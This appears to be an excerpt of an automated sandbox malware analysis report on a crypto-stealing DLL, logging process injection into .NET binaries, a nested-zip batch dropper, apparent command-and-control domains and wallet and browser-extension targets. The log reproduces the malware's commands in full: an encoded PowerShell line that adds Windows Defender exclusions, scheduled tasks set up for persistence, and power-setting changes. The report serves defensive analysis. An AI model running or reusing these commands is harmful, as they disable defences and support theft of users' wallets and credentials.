                Source: aspnet_regiis.exe, 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: relalingj.sbs
                Source: aspnet_regiis.exe, 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: rottieud.sbs
                Source: aspnet_regiis.exe, 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: brownieyuz.sbs
                Source: aspnet_regiis.exe, 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: explainvees.sbs
                Source: aspnet_regiis.exe, 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: ducksringjk.sbs
                Source: aspnet_regiis.exe, 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: thinkyyokej.sbs
                Source: aspnet_regiis.exe, 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: repostebhu.sbs
                Source: aspnet_regiis.exe, 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: pragapin.sbs
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 77060000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 77061000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 7709E000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 770A1000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 770B2000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 770B3000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 77061000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 7709E000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 770A1000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 770B2000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 770B3000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2AFA008Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 77060000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 77061000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 7709E000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 770A1000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 770B2000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 770B3000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 77061000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 7709E000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 770A1000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 770B2000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 770B3000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 22D3008Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 77060000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 77061000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 7709E000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 770A1000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 770B2000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 770B3000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 77061000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 7709E000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 770A1000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 770B2000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 770B3000Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2559008Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 160000
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 2B5008
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\n7ZKbApaa3.dll",#1Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p29586644319935208542739921766 -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_11.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_10.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_9.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_8.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4013" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4013" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajaecasgbpafiaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwboagiaiwa+acaalqbfahgaywbsahuacwbpag8abgbqageadaboacaaqaaoacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaakaguabgb2adoauwb5ahmadablag0arabyagkadgblackaiaa8acmacab2agoadgbzafcabqbpaewaiwa+acaalqbgag8acgbjaguaiaa8acmangboafoamaa4agoacabiahyabgajad4a" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajaecasgbpafiaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwboagiaiwa+acaalqbfahgaywbsahuacwbpag8abgbqageadaboacaaqaaoacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaakaguabgb2adoauwb5ahmadablag0arabyagkadgblackaiaa8acmacab2agoadgbzafcabqbpaewaiwa+acaalqbgag8acgbjaguaiaa8acmangboafoamaa4agoacabiahyabgajad4a"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajaecasgbpafiaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwboagiaiwa+acaalqbfahgaywbsahuacwbpag8abgbqageadaboacaaqaaoacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaakaguabgb2adoauwb5ahmadablag0arabyagkadgblackaiaa8acmacab2agoadgbzafcabqbpaewaiwa+acaalqbgag8acgbjaguaiaa8acmangboafoamaa4agoacabiahyabgajad4a" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajaecasgbpafiaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwboagiaiwa+acaalqbfahgaywbsahuacwbpag8abgbqageadaboacaaqaaoacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaakaguabgb2adoauwb5ahmadablag0arabyagkadgblackaiaa8acmacab2agoadgbzafcabqbpaewaiwa+acaalqbgag8acgbjaguaiaa8acmangboafoamaa4agoacabiahyabgajad4a"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
                Source: aspnet_regiis.exe, 00000007.00000003.1799939170.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1721547580.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1685994655.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1692490645.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1721867399.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.1804443688.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1667673144.0000000002935000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7188, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7232, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: aspnet_regiis.exeString found in binary or memory: s/Electrum-LTC
                Source: aspnet_regiis.exeString found in binary or memory: %appdata%\ElectronCash\wallets
                Source: aspnet_regiis.exeString found in binary or memory: Wallets/JAXX New Version
                Source: aspnet_regiis.exe, 00000007.00000003.1721547580.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: aspnet_regiis.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: aspnet_regiis.exeString found in binary or memory: ExodusWeb3
                Source: aspnet_regiis.exe, 00000007.00000003.1721547580.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: aspnet_regiis.exe, 00000007.00000002.1804039273.0000000002E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsH
                Source: aspnet_regiis.exe, 00000007.00000003.1667810634.0000000002EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
